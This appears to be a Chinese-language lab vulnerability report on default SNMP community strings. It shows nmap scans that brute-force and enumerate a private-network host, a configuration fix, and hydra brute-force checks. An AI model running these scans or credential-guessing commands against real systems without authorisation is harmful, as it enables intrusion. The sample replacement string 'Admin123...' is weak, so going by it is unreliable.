1. 漏洞报告

2. 漏洞介绍

      SNMP是英文"Simple Network Management Protocol"的缩写，中文意思是"简单网络管理协议"。简单网络管理协议（SNMP）是TCP／IP协议簇的一个应用层协议，工做在UDP 161端口，用于监控目标设备的操做系统、硬件设备、服务应用、软硬件配置、网络协议状态、设备性能及资源利用率、设备报错事件信息、应用程序状态等软硬件信息。SNMP包含SNMPv1（采用团体名认证机制）、SNMPv2c（同版本1，提供更多的错误识别代码）和SNMPv3（采用基于用户的安全模型认证机制）三个版本。该协议容易实现且其广泛的TCP/IP应用基础被众多设备厂商支持，用于防火墙、路由器、交换机和网桥等设备。但该协议v1和v2版本存在“public”和“private”团体默认值漏洞，攻击者可利用“public”默认值远程读取网络设备信息，利用“private”默认值获取网络设备管理权，对网络进行攻击和破坏。

3. 漏洞危害

      在远程网络管理中,SNMP协议通常用"public"和"private"作为团体默认值,分别对应于"读"和"写"。但这种团体默认值存在安全漏洞,攻击者可利用此漏洞来获取有关远程主机的更多信息或者对内部网络进行破坏。

4. NMAP漏洞检测和利用

## 漏洞检测
λ nmap -sU -sV -Pn -p 161 --script="snmp-brute" 192.168.43.58

PORT    STATE SERVICE VERSION
161/udp open  snmp    SNMPv1 server; net-snmp SNMPv3 server (public)
| snmp-brute:
|   public - Valid credentials
|_  private - Valid credentials
| snmp-info:
|   enterprise: net-snmp
|   engineIDFormat: unknown
|   engineIDData: 99e37402dc755153
|   snmpEngineBoots: 33
|_  snmpEngineTime: 2h37m13s

## 漏洞利用

## 尝试通过SNMP枚举正在运行的进程。
nmap -sU -sV -Pn -p 161 --script="snmp-processes" 192.168.43.58

## 尝试从SNMP版本1服务中提取系统信息
nmap -sU -sV -Pn -p 161 --script="snmp-sysdescr" 192.168.43.58

## 尝试查询SNMP以获取类似netstat的输出
nmap -sU -sV -Pn -p 161 --script="snmp-netstat" 192.168.43.58

## 尝试通过SNMP枚举网络接口
λ nmap -sU -sV -Pn -p 161 --script="snmp-interfaces" 192.168.43.58

PORT    STATE SERVICE VERSION
161/udp open  snmp    SNMPv1 server; net-snmp SNMPv3 server (public)
| snmp-info:
|   enterprise: net-snmp
|   engineIDFormat: unknown
|   engineIDData: 99e37402dc755153
|   snmpEngineBoots: 33
|_  snmpEngineTime: 3h09m12s
| snmp-interfaces:
|   lo
|     IP address: 127.0.0.1  Netmask: 255.0.0.0
|     Type: softwareLoopback  Speed: 10 Mbps
|     Status: up
|     Traffic stats: 14.70 Kb sent, 14.70 Kb received
|   eth0
|     IP address: 192.168.43.58  Netmask: 255.255.255.0
|     MAC address: 00:0c:29:3e:ba:70
|     Type: ethernetCsmacd  Speed: 10 Mbps
|     Status: up
|_    Traffic stats: 4.48 Mb sent, 4.13 Mb received

5. 漏洞修复

修改配置文件/etc/snmp/snmpd.conf将Public改成其他具有复杂度的字符串如Admin123...，保存后重新启动SNMP服务即可。

C:\root\桌面> cat /etc/snmp/snmpd.conf | grep Admin123... -A 2 -B 2
#       sec.name  source          community
#com2sec paranoid  default         public
com2sec readonly  default         Admin123...
com2sec readwrite default         Admin123....

####
C:\root\桌面> /etc/init.d/snmpd restart
Restarting network management services: snmpd.

Kali使用hydra暴力破解工具进行验证

## 使用原字符串进行登录尝试失败
C:\root\桌面> hydra -p public -s 161 192.168.43.58 snmp
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-04-19 17:23:18
[DATA] max 1 task per 1 server, overall 1 task, 1 login try (l:1/p:1), ~1 try per task
[DATA] attacking snmp://192.168.43.58:161/
1 of 1 target completed, 0 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-04-19 17:23:26

## 使用修改后的字符串进行登录尝试成功
C:\root\桌面> hydra -p Admin123... -s 161 192.168.43.58 snmp              
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-04-19 17:23:07
[DATA] max 1 task per 1 server, overall 1 task, 1 login try (l:1/p:1), ~1 try per task
[DATA] attacking snmp://192.168.43.58:161/
[161][snmp] host: 192.168.43.58   password: Admin123...
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-04-19 17:23:07